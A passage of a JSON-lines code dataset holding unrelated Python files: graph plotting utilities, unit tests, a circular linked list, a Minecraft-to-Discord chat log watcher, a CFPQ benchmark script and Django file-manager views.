the alphabet'\n mapping = {}\n labeled = False\n for a, letter in zip(country, list(string.ascii_lowercase)[:len(country)]):\n for i in a:\n mapping[i] = letter\n pos = nx.circular_layout(graph)\n nx.draw_networkx(graph, with_labels=labeled, ax=ax_graph, node_color=colors, vmin=0, vmax=100, pos=pos)\n nx.draw_networkx_labels(graph, labels=mapping, ax=ax_graph, pos=pos)\n \n sizes = [graph.degree(i)*10 for i in range(graph.order())]\n if circle:\n # Plots nodes in a circle: specially good for the small-world but also looks good for scale-free\n nx.draw_circular(graph, with_labels=False, ax=ax_graph, node_size=sizes, node_color=colors, vmin=0, vmax=100)\n elif country == None:\n # Plots nodes so that the graph is visualized better and sometimes can be good for identifying clusters\n nx.draw_kamada_kawai(graph, with_labels=False, ax=ax_graph, node_size=sizes, node_color=colors, vmin=0, vmax=100)\n\n\n # Plot curves\n self.lines = []\n for curve in self.curves:\n line, = self.ax_curves.plot(curve[0], curve[1]) # curve: [xs, ys]\n self.lines.append(line)\n n_sim_steps = len(self.curves[0][0])\n self.ax_curves.set_xlim([-0.1, n_sim_steps-1])\n\n\n # Save current curves colors and zorders for later 'hover off' update\n self.colors = []\n self.zorders = []\n for line in self.lines:\n self.colors.append(line.get_color())\n self.zorders.append(line.get_zorder())\n\n self.fig.canvas.mpl_connect(\"motion_notify_event\", self.hover)\n self.needs_refresh_on_hover_off = False\n\n # Create a slider for the simulation steps (for node coloring)\n ax_slider = plt.axes([0.25, 0.1, 0.65, 0.03], facecolor='white')\n self.slider = Slider(ax_slider, 'Simulation step', 0, n_sim_steps-1, valinit=n_sim_steps, valstep=1)\n self.slider.on_changed(self.update_node_colors)\n\n # Add guiding curve to curves plot\n self.guiding_curve = self.ax_curves.axvline(n_sim_steps-1, linestyle='--', color='r')\n\n def update_node_colors(self, value):\n # Update color of each node in the graph\n pc = self.ax_graph.collections[0]\n cmap = pc.cmap\n min_v, max_v = pc.get_clim()\n new_colors = np.array([curve[1][int(value)] for curve in self.curves])\n percents = np.clip((new_colors - min_v) / (max_v - min_v), 0, 1)\n pc.set_color(cmap(percents))\n\n # Adjust guiding curve x-position\n self.guiding_curve.set_xdata([value, value])\n\n self.fig.canvas.draw_idle()\n\n def update_curve_colors(self, ind):\n for i, l in enumerate(self.lines):\n if i in ind['ind']:\n l.set_color('r')\n l.set_zorder(max(self.zorders)+1)\n else:\n l.set_color('lightgray')\n self.needs_refresh_on_hover_off = True\n\n def hover(self, event):\n if event.inaxes == self.ax_graph:\n cont, ind = self.ax_graph.collections[0].contains(event)\n if cont:\n self.update_curve_colors(ind)\n self.fig.canvas.draw_idle()\n elif self.needs_refresh_on_hover_off:\n for line, color, zorder in zip(self.lines, self.colors, self.zorders):\n line.set_color(color)\n line.set_zorder(zorder)\n self.fig.canvas.draw_idle()\n self.needs_refresh_on_hover_off = False\n\n\n# Example usage\nif __name__ == '__main__':\n seed = 1\n np.random.seed(seed)\n\n # Generate graph\n G = nx.watts_strogatz_graph(15, 4, 0.3, seed=seed)\n xs = [i for i in range(10)]\n ys = [[x**2*j for x in xs] for j in range(15)]\n\n # Generate curves\n curves = []\n for y in ys:\n curves.append([xs, y])\n\n # Create figure and plot\n f, ax = plt.subplots(nrows=2)\n linked_plotter = LinkedPlotter(G, curves, ax[0], ax[1], f)\n plt.show()\n\n\ndef avgPlotter(graph, contribution_curves, mean_contribs, ax_degree, ax_avg, box_plot=False, median=True, log_scale=True, size_marker=5, network=\"\"):\n \"\"\"\n Generates a scatter plot of the mean contribution vs the number of neighbours (with error bars) if box_plot is set\n to False (default) or a boxplot if it is set to True. And also a plot (with error regions) for the average contribution\n over time\n\n Params:\n graph: Graph to be plotted.\n contribution_curves: List of contribution curves. Each element is a list [xs, ys], where xs and ys are respectively a list\n of the x and y coordinates of the points to be plotted.\n mean_contribs: mean contribution over time (first row) with standard deviation (second row)\n ax_degree: The axis in which the scatter plot should be plotted.\n ax_avg: The axis in which the average contribution should be plotted.\n \"\"\"\n\n # Plot scatter\n contributions = [y[len(y) - 1] for _, y in contribution_curves]\n degree = [graph.degree(i) for i in range(graph.order())]\n existing_degrees = [d for d in sorted(set(degree))]\n min_degree = min(degree)\n max_degree = max(degree)\n ordered_contribs = [[] for i in range(len(existing_degrees))]\n for idx in range(len(degree)):\n ordered_contribs[existing_degrees.index(degree[idx])].append(contributions[idx])\n if box_plot:\n ax_degree.boxplot(ordered_contribs, positions=existing_degrees)\n elif median:\n median_contribs_degree = [np.median(ordered_contribs[i]) for i in range(len(existing_degrees))]\n error_bars = np.zeros((2, len(existing_degrees)))\n error_bars[0, :] = [median_contribs_degree[i] - np.percentile(ordered_contribs[i], 25) for i in range(len(existing_degrees))]\n error_bars[1, :] = [np.percentile(ordered_contribs[i], 75) - median_contribs_degree[i] for i in range(len(existing_degrees))]\n\n size_marker = [len(ordered_contribs[i]) * size_marker for i in range(len(existing_degrees))]\n ax_degree.scatter(existing_degrees, median_contribs_degree, s=size_marker)\n ax_degree.errorbar(existing_degrees, median_contribs_degree, error_bars,\n alpha=0.5, linestyle='--')\n else:\n mean_contribs_degree = [mean(ordered_contribs[i]) for i in range(len(existing_degrees))]\n std_mean_contribs_degree = []\n for i in range(len(existing_degrees)):\n if len(ordered_contribs[i]) > 1:\n std_mean_contribs_degree.append(stdev(ordered_contribs[i]) / np.sqrt(len(ordered_contribs[i])))\n else:\n std_mean_contribs_degree.append(0)\n\n size_marker = [len(ordered_contribs[i])*size_marker for i in range(len(existing_degrees))]\n ax_degree.scatter(existing_degrees, mean_contribs_degree, s=size_marker)\n ax_degree.errorbar(existing_degrees, mean_contribs_degree, std_mean_contribs_degree,\n alpha=0.5, linestyle='--')\n\n if log_scale:\n ax_degree.set_xscale('log')\n\n\n # Plot avg. contribution\n mean_color = (np.random.rand(), np.random.rand(), np.random.rand(), 0.3)\n if network == \"WS\":\n mean_color = \"green\"\n elif network == \"BA\":\n mean_color = \"orange\"\n elif network == \"FB\":\n mean_color = \"blue\"\n x = list(range(len(mean_contribs[0, :])))\n #ax_avg.plot(mean_contribs[0, :], color=mean_color)\n ax_avg.plot(mean_contribs[0, :], color=mean_color, )\n plt.fill_between(x, (mean_contribs[1, :]), (mean_contribs[2, :]), color=mean_color, alpha=0.3 ,edgecolor=None)\n plt.ylim(0, 100);\n\n\ndef changePlotter(graph, contribution, rounds, args, titles=None, y_labels=None, cols=5):\n \"\"\"\n Generate plot of changes to network graph.\n\n Params:\n graph: Graph to be plotted.\n contribution: Array of contributions with shape (rounds, player).\n rounds: List of rounds to be plotted.\n args: Argparse arguments.\n titles: Titles for each of the graphs.\n y_labels: Labels per row.\n cols: Number of columns.\n\n \"\"\"\n sizes = [graph.degree(i)*10 for i in range(graph.order())]\n if not titles:\n titles = [f\"Round: {i}\" for i in rounds]\n\n # Dynamics subplot to show developement of the network\n N = len(rounds)\n cols = cols\n rows = N // cols + 1 if N % cols else N // cols\n #print(N, cols, rows)\n\n gs = gridspec.GridSpec(rows, cols)\n fig = plt.figure(figsize=(1.2*rows*6, 1.2*cols))\n for i in range(N):\n ax = fig.add_subplot(gs[i])\n ax.set_title(titles[i])\n \n colors = contribution[rounds[i],:]\n if args.network == \"WS\":\n nx.draw_circular(graph, with_labels=False, ax=ax, node_size=sizes, node_color=colors, vmin=0, vmax=100)\n elif args.network == \"BA\":\n nx.draw_kamada_kawai(graph, with_labels=False, ax=ax, node_size=sizes, node_color=colors, vmin=0, vmax=100)\n\n if y_labels:\n # Custom y labels\n ax.set_axis_on()\n if i%cols==0:\n ax.set_ylabel(y_labels[i//cols])\n ax.tick_params(\n axis='x',\n which='both',\n bottom=False,\n top=False,\n labelbottom=False)\n ax.spines['right'].set_visible(False)\n ax.spines['top'].set_visible(False)\n ax.spines['left'].set_visible(False)\n ax.spines['bottom'].set_visible(False)\n\n \n return plt\n","sub_path":"plot_utils.py","file_name":"plot_utils.py","file_ext":"py","file_size_in_byte":11085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"296146569","text":"import unittest\n\nimport numpy as np\n\nfrom lib.binary import iterate_binary_dataset\n\n\nclass BinaryTests(unittest.TestCase):\n def test_data_set_consistency(self):\n \"\"\"...Test binary datasets have the expected shape\n \"\"\"\n for name, x, y, n_observations, n_features in \\\n iterate_binary_dataset():\n self.assertEqual(x.shape[0], n_observations,\n \"Incorrect number of observations in %s\" % name)\n self.assertEqual(y.shape[0], n_observations,\n \"Incorrect number of labels in %s\" % name)\n self.assertEqual(x.shape[1], n_features,\n \"Incorrect number of features in %s\" % name)\n\n self.assertEqual(set(np.unique(y)), {-1, 1},\n \"Incorrect labels encoding in %s\" % name)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"lib/tests/binary_test.py","file_name":"binary_test.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"264480081","text":"# -*- coding:utf-8 -*-\n'''\n원형연결리스트(Circular Linked List)는 마지막 노드가 첫 노드와 연결된 단순연결리스트이다.\n\n*마지막 노드와 첫 노드를 O(1)시간에 방문할 수 있는 장점을 가진다. 또한 리스트가 empty가 아니면,\n어떤 노드도 None을 가지고 있지 않으므로 프로그램에서 None 조건을 검사하지 않아도 된다는 장점을 가진다.\n\n*반대 방향으로 노드들을 방문하기가 쉽지 않으며, 무한 루프가 발생할 수 있음에 유의할 필요가 있다.\n'''\n\nclass CList:\n\n # 노드 생성자 항목과 다음 노드 레퍼런스\n class Node:\n def __init__(self, item, link):\n self.item = item\n self.next = link\n \n # 원형연결리스트 생성자, last와 항목 수로 구성.\n def __init__(self):\n self.last = None\n self.size = 0\n\n def no_items(self): return self.size\n def is_empty(self): return self.size == 0\n\n def insert(self, item):\n # 새 항목을 저장할 노드를 생성한 후, 연결리스트가 empty인 경우와 그렇지 않은 경우로 나눔.\n n = self.Node(item, None) \n\n if self.is_empty():\n n.next = n\n self.last = n\n else:\n n.next = self.last.next\n self.last.next = n\n \n self.size += 1\n\n def first(self):\n if self.is_empty():\n raise EmptyError('Underflow')\n f = self.last.next\n return f.item\n\n # 리스트의 첫 노드를 삭제함. \n # 노드가 1개 인 경우, last를 None으로 만든다.\n # 노드가 2개 이상인 경우, x가 가리키는 노드를 연결리스트에서 분리한다.\n def delete(self):\n if self.is_empty():\n raise EmptyError('Underflow')\n x = self.last.next\n \n if self.size == 1:\n self.last = None\n else:\n self.last.next = x.next\n self.size -= 1\n\n return x.item\n\n def print_list(self):\n if self.is_empty():\n print('list is empty')\n else:\n f = self.last.next\n p = f\n while p.next != f:\n print(p.item, ' -> ', end='')\n p = p.next\n print(p.item)\n\nclass EmptyError(Exception):\n pass","sub_path":"CircularLinkedList/Circularlist.py","file_name":"Circularlist.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"423902856","text":"from evolve.commit import Commit\nfrom evolve.branch import Branch\n\n\nclass BranchNotFound(Exception):\n pass\n\n\nclass BranchAlreadyExists(Exception):\n pass\n\n\nclass NoCommonParent(Exception):\n pass\n\n\nclass Repository(object):\n def __init__(self):\n self.commits = {'root': {'changelog': [], 'msg': 'root'}}\n self.branches = {}\n self.checkouts = {}\n \n def branch(self, branch_name, parent_branch_name=None):\n if branch_name in self.branches:\n raise BranchAlreadyExists(\"The branch %s already exists, use checkout()\" % branch_name)\n \n if parent_branch_name:\n try:\n self.branches[branch_name] = self.branches[parent_branch_name]\n except KeyError:\n raise BranchNotFound(\"Could not find the %s branch\" % parent_branch_name)\n else:\n self.branches[branch_name] = 'root'\n return self.checkout(branch_name)\n \n def checkout(self, branch_name):\n try:\n commit_id = self.branches[branch_name]\n except KeyError:\n raise BranchNotFound(\"Could not find the %s branch\" % branch_name)\n \n try:\n commit = self.checkouts[commit_id]\n except KeyError:\n commit = Commit(self)\n commit.checkout(commit_id)\n self.checkouts[commit_id] = commit\n \n branch = Branch(self, branch_name, commit)\n return branch\n \n def find_common_parent(self, commit_one, commit_two):\n \"\"\"Find the common parent between the two commits if one exists\"\"\"\n one = Commit(self)\n one.checkout(commit_one)\n two = Commit(self)\n two.checkout(commit_two)\n listone = one.getAncestors()\n listtwo = two.getAncestors()\n def compare(a, b):\n common = None\n for index in range(len(a)):\n if a[index] is not b[index]:\n return common\n common = a[index]\n return common\n \n if len(listone) < len(listtwo):\n common = compare(listone, listtwo)\n else:\n common = compare(listtwo, listone)\n \n if not common:\n raise NoCommonParent(\"The commits %s and %s do not share a common parent\" % (commit_one, commit_two))\n \n return common\n \n def migrate(self, commit_one, commit_two):\n \"\"\"Migrate from one commit to another\"\"\"\n parent = self.find_common_parent(commit_one, commit_two)\n c1 = Commit(self)\n c1.checkout(commit_one)\n c2 = Commit(self)\n c2.checkout(commit_two)\n log = c1.rollback(parent)\n log.extend(c2.rollforward(parent))\n return log","sub_path":"evolve/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"507308939","text":"import unittest\n\nimport numpy as np\nfrom ddt import ddt, unpack, data\n\nfrom lib.board import Board\n\n\n@ddt\nclass TestMethods(unittest.TestCase):\n\n def setUp(self):\n self.board = Board(height=10, width=8)\n\n def test_count_same_elements_next_to_each_other__5_in_row(self):\n a = np.array([1, 0, 1, 0, 0, 1, 1, 1, 1, 1])\n self.assertFalse(Board._has_enough_elements_in_row(a, 1, 6))\n self.assertTrue(Board._has_enough_elements_in_row(a, 1, 5))\n self.assertFalse(Board._has_enough_elements_in_row(a, 0, 4))\n self.assertFalse(Board._has_enough_elements_in_row(a, 0, 3))\n self.assertTrue(Board._has_enough_elements_in_row(a, 0, 2))\n\n @data(\n [(3, 5), (0, 2)],\n [(8, 3), (5, 0)],\n [(4, 4), (0, 0)]\n )\n @unpack\n def test_first_in_skew_upleft(self, pos, exp_pos):\n res = self.board.get_first_position_in_skew(pos, -1)\n self.assertEqual(res, exp_pos)\n\n @data(\n [(2, 7), (0, 9)],\n [(7, 8), (6, 9)],\n [(2, 4), (0, 6)],\n [(4, 5), (0, 9)]\n )\n @unpack\n def test_first_in_skew_downleft(self, pos, exp_pos):\n res = self.board.get_first_position_in_skew(pos, 1)\n self.assertEqual(res, exp_pos)\n","sub_path":"zad_03/tests/test_methods.py","file_name":"test_methods.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"32729919","text":"from os import SEEK_END, stat, linesep\nfrom pathlib import Path\nfrom re import search, split, findall\nfrom sys import exc_info\nfrom threading import Thread\nfrom time import sleep\nfrom traceback import print_exc\n\nfrom discord import Webhook, RequestsWebhookAdapter\n\nfrom config.init_config import Config, BotVars\n\n\nclass Watcher:\n _running = True\n _thread = None\n\n # Constructor\n def __init__(self, watch_file: Path, call_func_on_change=None, *args, **kwargs):\n self._cached_stamp = None\n self._filename: Path = watch_file\n self._call_func_on_change = call_func_on_change\n self._refresh_delay_secs = Config.get_cross_platform_chat_settings().refresh_delay_of_console_log\n self._args = args\n self._kwargs = kwargs\n\n # Look for changes\n def look(self):\n stamp = stat(self._filename).st_mtime\n if stamp != self._cached_stamp:\n temp = self._cached_stamp\n self._cached_stamp = stamp\n if self._call_func_on_change is not None and temp is not None:\n BotVars.watcher_last_line = self._call_func_on_change(file=self._filename,\n last_line=BotVars.watcher_last_line,\n *self._args, **self._kwargs)\n\n # Keep watching in a loop\n def watch(self):\n while self._running:\n try:\n # Look for changes\n sleep(self._refresh_delay_secs)\n self.look()\n except FileNotFoundError:\n print(f\"Watcher Error: File {self._filename} wasn't found!\")\n except UnicodeDecodeError:\n print(f\"Watcher Error: Can't decode strings from file '{self._filename.as_posix()}'\"\n \", check that minecraft server saves it in utf-8 encoding!\\n\"\n \"(Ensure you have '-Dfile.encoding=UTF-8' as one of the arguments \"\n \"to start the server in start script)\")\n except BaseException:\n print(f\"Watcher Unhandled Error: {exc_info()[0]}\")\n print_exc()\n\n def start(self):\n self._thread = Thread(target=self.watch, daemon=True)\n self._thread.start()\n\n def stop(self):\n self._running = False\n if self._thread is not None:\n self._thread.join()\n self._thread = None\n\n def is_running(self):\n return self._running\n\n\ndef create_watcher():\n if BotVars.watcher_of_log_file is not None and BotVars.watcher_of_log_file.is_running():\n BotVars.watcher_of_log_file.stop()\n\n BotVars.watcher_of_log_file = Watcher(watch_file=Path(Config.get_selected_server_from_list().working_directory\n + \"/logs/latest.log\"),\n call_func_on_change=_check_log_file)\n if BotVars.webhook_chat is None:\n BotVars.webhook_chat = \\\n Webhook.from_url(url=Config.get_cross_platform_chat_settings().webhook_url,\n adapter=RequestsWebhookAdapter())\n\n\ndef _check_log_file(file: Path, last_line: str = None):\n if Config.get_cross_platform_chat_settings().channel_id is None:\n return\n\n last_lines = _get_last_n_lines(file,\n Config.get_cross_platform_chat_settings().number_of_lines_to_check_in_console_log,\n last_line)\n if len(last_lines) == 0:\n return last_line\n\n if last_line is None:\n last_lines = last_lines[-1]\n\n for line in last_lines:\n if search(r\"\\[Server thread/INFO]\", line) and search(r\"<([^>]*)> (.*)\", line) and \": <\" in line:\n player_nick, player_message = search(r\"<([^>]*)>\", line)[0], \\\n split(r\"<([^>]*)>\", line, maxsplit=1)[-1].strip()\n if search(r\"@.+\", player_message):\n split_arr = split(r\"@[^\\s]+\", player_message)\n mentions = {i[1:].lower(): None for i in findall(r\"@[^\\s]+\", player_message)}\n for guild in BotVars.bot_for_webhooks.guilds:\n # Check mention on user mention\n for member in guild.members:\n if member.name.lower() in mentions.keys():\n mentions[member.name.lower()] = member\n elif member.display_name.lower() in mentions.keys():\n mentions[member.display_name.lower()] = member\n # Check mention on role mention\n for role in guild.roles:\n if role.name.lower() in mentions.keys():\n mentions[role.name.lower()] = role\n i = 1\n for name, mention_obj in mentions.items():\n split_arr.insert(i, mention_obj.mention if mention_obj is not None else f\"@{name}\")\n i += 2\n player_message = \"\".join(split_arr)\n\n BotVars.webhook_chat.send(rf\"**{player_nick}** {player_message}\")\n\n return last_lines[-1]\n\n\ndef _get_last_n_lines(file, number_of_lines, last_line):\n list_of_lines = []\n with open(file, 'rb') as read_obj:\n read_obj.seek(-len(linesep), SEEK_END)\n buffer = bytearray()\n pointer_location = read_obj.tell()\n while pointer_location >= 0:\n read_obj.seek(pointer_location)\n pointer_location = pointer_location - 1\n new_byte = read_obj.read(1)\n if new_byte == b'\\n':\n decoded_line = buffer[::-1].decode().strip()\n if decoded_line == last_line:\n return list(reversed(list_of_lines))\n list_of_lines.append(decoded_line)\n if len(list_of_lines) == number_of_lines:\n return list(reversed(list_of_lines))\n buffer = bytearray()\n else:\n buffer.extend(new_byte)\n if len(buffer) > 0:\n list_of_lines.append(buffer[::-1].decode().strip())\n return list(reversed(list_of_lines))\n","sub_path":"components/watcher_handle.py","file_name":"watcher_handle.py","file_ext":"py","file_size_in_byte":6170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"45716782","text":"import time\nimport os\nimport sys\n\nfrom formlang.contextfree import Grammar\nfrom formlang.graph import read_graph_from_file\nfrom antlr4.InputStream import InputStream\nfrom formlang.query import ParseError, parse_query\nfrom formlang.db import Executor, FileDatabase\n\n\nGRAPHS = {\n \"FullGraph\": [\n \"fullgraph_10\",\n \"fullgraph_50\",\n \"fullgraph_100\",\n \"fullgraph_200\",\n \"fullgraph_500\"\n ],\n \"MemoryAliases\": [\n \"wc.txt\",\n \"bzip2.txt\",\n \"pr.txt\",\n \"ls.txt\",\n ],\n \"WorstCase\": [\n \"worstcase_4\",\n \"worstcase_8\",\n \"worstcase_16\",\n \"worstcase_32\",\n \"worstcase_64\",\n \"worstcase_128\",\n \"worstcase_256\",\n ]\n}\n\nALGORITHMS = [\"hellings\", \"matrix\", \"tensor\"]\n\n\ndef measure(db_path, graph, grammar_path, algorithm):\n grammar = \"\"\n start = None\n with open(grammar_path, \"r\") as f:\n for line in f:\n lhs, rhs = line.strip().split(\" \", 1)\n if start is None:\n start = lhs\n grammar += f\"{lhs} = {rhs};\\n\"\n\n script = f\"\"\"\nconnect \"{db_path}\";\n{grammar}\nselect a, b from \"{graph}\" where path(a, b, {start}) using \"{algorithm}\";\n\"\"\"\n\n print(script)\n\n t1 = time.time()\n parsed = parse_query(InputStream(script))\n executor = Executor(FileDatabase())\n executor.execute_many(parsed)\n t2 = time.time()\n\n return t2 - t1\n\n\ndef benchmark_cfpq(datapath):\n for ds in GRAPHS:\n graphs = GRAPHS[ds]\n grammars = sorted(os.listdir(os.path.join(datapath, ds, \"grammars\")))\n db_path = os.path.join(datapath, ds, \"graphs\")\n\n for graph in graphs:\n for algorithm in ALGORITHMS:\n for grammar in grammars:\n print(algorithm, grammar, graph, file=sys.stderr)\n try:\n grammar_path = os.path.join(datapath, ds, \"grammars\", grammar)\n timing = measure(db_path, graph, grammar_path, algorithm)\n print(\"%.5f sec\" % timing, file=sys.stderr)\n except KeyboardInterrupt:\n print(\"Press ^C again to exit, press ENTER to continue\", file=sys.stderr)\n input()\n","sub_path":"formlang/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"63777954","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom django.shortcuts import HttpResponse\nfrom fileManager.models import UserFile, FileMap\nfrom sign_io.models import User\nfrom knowNet.models import UserNode, NodeMap, FileNode\nfrom django.core import serializers\nimport os, random\nfrom django.conf import settings\nfrom django.db import IntegrityError\nimport requests, json\nfrom PIL import Image\nfrom datetime import datetime\nimport numpy as np\nimport hashlib\nimport zipfile\n\n'''\n移动文件或文件夹到文件夹\n\n@param: userId fileId dirId\n@return res['status'] 'OK' | 'NOTOK'\n\n'''\n\ndef moveToDir(request):\n res = {}\n res['status'] = 'ERROR'\n if request.method == 'POST':\n userId = request.POST.get(\"userId\")\n fileId = request.POST.get(\"fileId\")\n dirId = request.POST.get(\"dirId\")\n\n user = User.objects.get(userId=userId)\n filemap = FileMap.objects.get(fileId=fileId)\n uf = UserFile.objects.filter(usermap=user, filemap=filemap)\n \n if uf.exists():\n query = uf[0]\n query.dirId = dirId\n query.save()\n res['status'] = 'OK'\n else:\n res['status'] = 'NOTOK'\n \n return JsonResponse(res)\n\n'''\n\n重命名文件或文件夹\n\n@param: userId fileId rename\n@return: res['status'] 'OK' | 'NOTOK'\n\n'''\n\ndef rename(request):\n res = {}\n res['status'] = 'ERROR'\n if request.method == 'POST':\n userId = request.POST.get(\"userId\")\n fileId = request.POST.get(\"fileId\")\n renameBuffer = request.POST.get(\"rename\")\n\n user = User.objects.get(userId=userId)\n filemap = FileMap.objects.get(fileId=fileId)\n uf = UserFile.objects.filter(usermap=user, filemap=filemap)\n \n if uf.exists():\n query = uf[0]\n query.fileName = renameBuffer\n query.save()\n res['fileName'] = query.fileName\n res['status'] = 'OK'\n else:\n res['status'] = 'NOTOK'\n \n return JsonResponse(res)\n\n'''\n\n创建新文件夹并保存到对应用户下\n\n@param request Get请求\n@return JsonResponse(res) \n\n'''\n\ndef getMkdir(request):\n res = {}\n res['status'] = 'ERROR'\n if request.method == 'GET':\n dirId = request.GET.get(\"dirId\")\n userId = request.GET.get(\"userId\")\n user = User.objects.get(userId=userId)\n fileId = makeFileId()\n \n newFile = FileMap()\n newFile.fileId = fileId\n newFile.ownermap = user\n newFile.filePath = os.path.join(settings.MEDIA_ROOT, str(userId), str(fileId))\n newFile.fileType = 100\n newFile.fileMd5 = hashlib.md5(str(datetime.now()).encode(\"utf-8\")).hexdigest()\n newFile.buildTime = datetime.now()\n newFile.modTime = datetime.now()\n newFile.readTime = datetime.now()\n newFile.save()\n os.makedirs(newFile.filePath)\n\n dirName = \"新建文件夹\"\n testName = dirName \n counter = 1\n arr = UserFile.objects.filter(fileName=testName, dirId=dirId)\n while arr.exists():\n testName = dirName + str(counter)\n arr = UserFile.objects.filter(fileName=testName)\n counter += 1\n \n dirName = testName\n newQuery = UserFile()\n newQuery.usermap = user\n newQuery.filemap = FileMap.objects.get(fileId=fileId)\n newQuery.fileName = dirName\n newQuery.dirId = dirId\n newQuery.save()\n res['status'] = 'OK'\n \n return JsonResponse(res)\n\n'''\n\n获取星标文件列表\n\n@param request Get/Post请求\n@return JsonResponse(res) \n\n'''\n\ndef getStarFileList(request):\n res = {}\n if request.method == 'GET':\n userId = request.GET.get('userID')\n user = User.objects.get(userId=userID)\n fileRes = user.userfile_set.all()\n #fileRes = UserFile.objects.filter(userId=user)\n fileList = []\n # i 为userFile, userId查询结果\n for i in fileRes:\n if i.star == \"true\":\n fileMap = FileMap.objects.filter(fileId=i.filemap.fileId)[0]\n\n fileList.append({\n 'name': fileMap.fileName,\n 'id': i.filemap.fileId,\n 'type': fileMap.fileType,\n 'commitMsg': i.commitMsg,\n 'star': i.star\n })\n\n res['fileList'] = fileList\n return JsonResponse(res)\n\n'''\n\n设置/取消文件星标\n\n@param request Get/Post请求\n@return JsonResponse(res) \n\n'''\n\ndef getStar(request):\n if request.method == 'GET':\n userId = request.GET.get('userId')\n fileId = request.GET.get('fileId')\n status = request.GET.get('star') \n user = User.objects.get(userId=userId)\n filemap = FileMap.objects.get(fileId=fileId)\n catchFile = UserFile.objects.filter(userId=user, fileId=filemap)\n for i in catchFile:\n i.star = status\n i.save()\n return HttpResponse('OK', status=200)\n\n return HttpResponse('error',status=403)\n\ndef writeAllFileToZip(saveDir, zipFile, userfile):\n uflist = UserFile.objects.filter(usermap = userfile.usermap, dirId=userfile.filemap.fileId)\n for uf in uflist:\n saveDir = os.path.join(saveDir, uf.fileName)\n if uf.filemap.fileType == 100:\n zipFile.write(uf.filemap.filePath, saveDir) #在zip文件中创建文件夹\n writeAllFileToZip(saveDir, zipFile, uf) #递归操作\n else: #判断是普通文件,直接写到zip文件中。\n zipFile.write(uf.filemap.filePath, saveDir)\n zipFile.close()\n return\n\n'''\n\n获取下载文件\n\n@param1: userId\n@param2: fileId\n\n'''\n\ndef getDownloadFile(request):\n res = HttpResponse('ERROR')\n if request.method == 'GET':\n userId =request.GET.get('userId')\n fileId =request.GET.get('fileId')\n\n user = User.objects.get(userId=userId)\n filemap = FileMap.objects.get(fileId=fileId)\n catchFile = UserFile.objects.filter(usermap=user, filemap=filemap)\n if catchFile.exists():\n filePath = filemap.filePath\n fileName = catchFile[0].fileName\n if filemap.fileType == 100:\n zipFilePath = os.path.join(os.path.dirname(filePath), fileName + '.zip')\n if not os.path.exists(zipFilePath):\n zipFile = zipfile.ZipFile(zipFilePath, \"w\", zipfile.ZIP_DEFLATED)\n writeAllFileToZip(fileName, zipFile, catchFile[0])\n filePath = zipFilePath\n fileName += '.zip'\n with open(filePath, \"rb\") as f:\n res = HttpResponse(f)\n disposition = \"attachment; filename=\" + fileName;\n res[\"Content-Disposition\"] = disposition.encode('utf-8', 'ISO-8859-1') \n return res\n\n\ndef getFileList(request):\n res = {}\n res['status'] = 'ERROR'\n if request.method == 'GET':\n userId = request.GET.get('userId')\n dirId = request.GET.get('dirId')\n user = User.objects.get(userId=userId)\n if dirId == \"-1\":\n fileRes = user.userfile_set.all()\n res['fileRes'] = -1\n else:\n fileRes = user.userfile_set.filter(dirId=dirId)\n res['fileRes'] = dirId\n\n fileList = []\n # i 为userFile, userId & dirId 查询结果\n for i in fileRes:\n fileMap = FileMap.objects.filter(fileId=i.filemap.fileId)[0]\n\n fileList.append({\n 'name': i.fileName,\n 'id': fileMap.fileId,\n 'dirId': i.dirId,\n 'type': fileMap.fileType,\n 'readTime': fileMap.readTime,\n 'commitMsg': i.commitMsg,\n 'star': i.star\n })\n\n res['fileList'] = fileList\n res['status'] = 'OK'\n return JsonResponse(res)\n\n'''\n\n获取上传文件并保存到对应用户下\n\n@param request Get/Post请求\n@return JsonResponse(res) \n@exception/throws IntegrityError 文件名冲突\n\n'''\n\ndef deleteFile(request):\n res = {}\n res['state'] = 'error'\n res['method'] = 'unknow'\n if request.method == 'GET':\n res['method'] = 'GET'\n userId = request.GET.get('userId')\n fileId = request.GET.get('fileId')\n \n user = User.objects.get(userId=userId)\n filemap = FileMap.objects.get(fileId=fileId)\n catchFile = UserFile.objects.filter(usermap=user, filemap=filemap)\n if catchFile.exists():\n catchFile.delete()\n filemap.delete()\n filePath = filemap.filePath\n if os.path.exists(filePath):\n os.remove(filePath)\n res['state'] = 'ok'\n return JsonResponse(res)\n else:\n res['status'] = 'uncatch'\n return JsonResponse(res) \n return JsonResponse(res)\n\ndef makeFileId():\n return int(random.random() * 1000000)\n\ndef checkFileType(fileName):\n fname, suffix = os.path.splitext(fileName)\n if suffix == \".jpg\" or suffix == \".jpeg\" or suffix == \".png\":\n return 1\n elif suffix == \".pdf\" or suffix == \".doc\" or suffix == \".docx\" or suffix == \".caj\":\n return 2\n elif suffix == \".xls\" or suffix == \".xlsx\":\n return 3\n elif suffix == \".ppt\" or suffix == \".pptx\":\n return 4\n elif suffix == \".mp4\" or suffix == \".mov\":\n return 5\n return 6\n\ndef magicBox(filePath, fileType):\n resStr = '['\n classModel = 'noModel'\n if fileType == 1:\n classModel = 'cifar10'\n imageData = Image.open(filePath)\n imageThreeMatrix = np.asarray(imageData.convert(\"RGB\").resize((32, 32)))\n imageThreeMatrix = 2 * (imageThreeMatrix / 255.) - 1\n for imageMatrix in imageThreeMatrix:\n resStr += '['\n for imageVector in imageMatrix:\n resStr += '['\n for imageValue in imageVector:\n resStr += str(imageValue) + ','\n resStr = resStr[:-1]\n resStr += '],'\n resStr = resStr[:-1]\n resStr += '],'\n else:\n 